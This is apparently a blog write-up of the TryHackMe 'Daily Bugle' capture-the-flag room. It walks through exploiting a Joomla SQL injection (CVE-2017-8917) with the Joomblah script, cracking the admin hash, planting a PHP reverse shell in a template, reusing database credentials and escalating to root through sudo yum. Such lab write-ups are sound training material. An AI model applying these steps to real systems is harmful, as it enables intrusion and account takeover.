iconBjarne Verschorre

../daily-bugle.md
Room Banner
🔗 https://tryhackme.com/r/room/dailybugle

Reconnaissance

After deployment, I started by just going to http://trgt/. It loaded a Joomla webpage where I immediately found the first answer. The spelling was diffrent, had to replace a character for it to work.

Joomla Version

I checked the Joomla version by going to http://trgt/administrator/manifests/files/joomla.xml allowing me to get the second question.

Exploitation

The Joomla CMS was vulnerable to CVE-2017-8917↗, an SQLi vulnerability. I used Joomblah↗ to exploit this vulnerability.

$ python3 joomblah.py http://trgt/

    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '<password hash>', '', '']
  -  Extracting sessions from fb9j5_session

Cracking the password gave me a working login for a “Super User”. I went to http://trgt/administrator/ which allowed me to login.

Foothold

Getting a foothold on the Joomla server was very similar to a WordPress server. Login as a priviliged user, go to themes / templates, add your own PHP reverse shell and profit.

For a reverse shell I used pentestmonky↗’s PHP Reverse Shell↗. This was easily and quickly done by using revshells↗.

I stablized the shell by doing

  1. $ python -c 'import pty;pty.spawn("/bin/bash")' (python3 wasn’t available on the box)
  2. CTRL + Z
  3. $ stty raw -echo; fg
  4. $ export TERM=xterm

Which gave me a better and more useable shell.

Privilege Escalation

Shell as jjameson

Looking at /home/ I saw a user called “jjameson” but the home directory was locked down. Further looking around, I found configuration.php in /var/html/www/ which stored MySQL credentials.

The MySQL database wasn’t all that interesting so I tried logging in to the user with the password which worked and gave me the user flag.

Shell as root

Doing a simple sudo -l showed that “jjameson” could run yum with root privileges. Looking it up on GTFOBins↗ gave me the information needed to get root shell and therefore the root flag.

Dogcat →